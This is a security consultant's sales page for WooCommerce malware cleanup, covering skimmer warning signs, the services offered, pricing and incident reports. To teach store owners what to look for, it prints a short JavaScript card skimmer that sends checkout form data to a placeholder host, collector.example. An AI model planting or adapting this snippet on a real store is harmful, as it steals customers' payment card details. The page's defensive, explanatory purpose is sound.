How do I know my WooCommerce store has a skimmer?

Common signals: customers report fraud after buying from you, your acquirer or bank flags suspicious chargebacks, browser dev-tools show an external JavaScript loaded on the checkout that you don't recognise, or a third-party scanner reports 'Magecart-style' injection. If any of these is true, treat the store as compromised until proven otherwise.

Do you handle PCI implications?

I produce a written incident report that documents what was found, when it was introduced, and what was removed. That report is the form your acquirer or QSA will expect. I am not a QSA and do not perform PCI audits — but my report is the technical record that supports one.

Will the store stay online during cleanup?

When safe, yes. If I find an active card-skimming injection, the checkout page should be taken down or the JavaScript blocked at the edge until cleanup completes — that protects new customers. We will recommend this in the triage note before any destructive change.

Is WooCommerce harder to clean than plain WordPress?

Mostly the same — WooCommerce is a plugin on top of WordPress — but the surface is bigger: more JavaScript on the checkout, more order data in the database, and a heavier plugin stack. The cleanup approach is identical: manual file and database review, vector identification, hardening.

WooCommerce · skimmer · backdoor · clean

WooCommerce malware removal.

Card skimmers, server-side backdoors, plugin RCE — worked through manually. JavaScript audit. Database review. Written report suitable for insurers and acquirers. Flat $279.

Start a cleanup What I look for

What gets done

Both sides of the wire.

Client-side
Card skimmers, payment-form overlays, conditional redirects, cryptojackers. JavaScript on the checkout audited line by line.
Server-side
Web shells, backdoors, plugin RCE payloads, injected admin users. Removed by reading file diffs and DB diffs, not pattern-matching.
DB audit
wp_options for autoloaded payloads, wp_posts for spam, wp_usermeta for sleeper privileges, wp_woocommerce_* tables for tampering.
Plugin triage
Active plugins reviewed against published CVEs. Vulnerable plugins patched or replaced — not just disabled.
Hardening
wp-config lockdown, secret rotation, 2FA on admin, login surface reduction. Closes the door before signing off.
Report
Plain-English forensic report: what was found, when it was introduced, what was removed. Hand it to an acquirer, an insurer, or your QSA.

What a skimmer looks like

External script on the checkout. That's usually it.

A WooCommerce skimmer is often a single JavaScript inclusion on the checkout page that posts the customer's form fields to a remote host before WooCommerce submits the order. The script is tiny, the network call looks like a third-party analytics ping, and the customer sees nothing wrong.

Rough shape of a checkout skimmer

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Real skimmers obfuscate the destination and only fire when the cart total is non-zero — but the structure is the same. Audit every JS on the checkout — including the ones you don't remember installing.

Pricing

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Start a cleanup

Monitoring

$29 / mo

per site, cancel any time

Continuous monitoring, hardening, one cleanup per year included.

Get protected

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

See all services →

Email [email protected] or use the contact form.